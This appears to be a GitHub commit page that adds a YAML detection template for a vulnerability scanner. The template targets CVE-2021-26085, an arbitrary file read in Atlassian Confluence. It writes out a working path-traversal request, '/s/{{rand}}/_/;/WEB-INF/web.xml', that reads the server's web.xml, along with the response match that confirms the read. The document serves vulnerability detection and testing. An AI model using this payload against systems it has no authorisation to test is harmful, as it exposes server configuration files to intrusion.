Skip to content

Commit

Permalink
Add poc-yaml-atlassian-confluence-cve-2021-26085-arbitrary-file-read (c…
Browse files Browse the repository at this point in the history
…haitin#1478)

* Add poc-yaml-atlassian-confluence-cve-2021-26085-arbitrary-file-read

* Update atlassian-confluence-cve-2021-26085-arbitrary-file-read.yml

* Update and rename atlassian-confluence-cve-2021-26085-arbitrary-file-read.yml to confluence-cve-2021-26085-arbitrary-file-read.yml

Co-authored-by: smile-jpg <[email protected]>
  • Loading branch information
wulalalaaa and smile-jpg authored Nov 8, 2021
1 parent 848b819 commit 14983a8
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions pocs/confluence-cve-2021-26085-arbitrary-file-read.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
manual: true
transport: http
set:
rand: randomLowercase(6)
rules:
r0:
request:
cache: true
method: GET
path: /s/{{rand}}/_/;/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
expression: r0()
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html

0 comments on commit 14983a8

Please sign in to comment.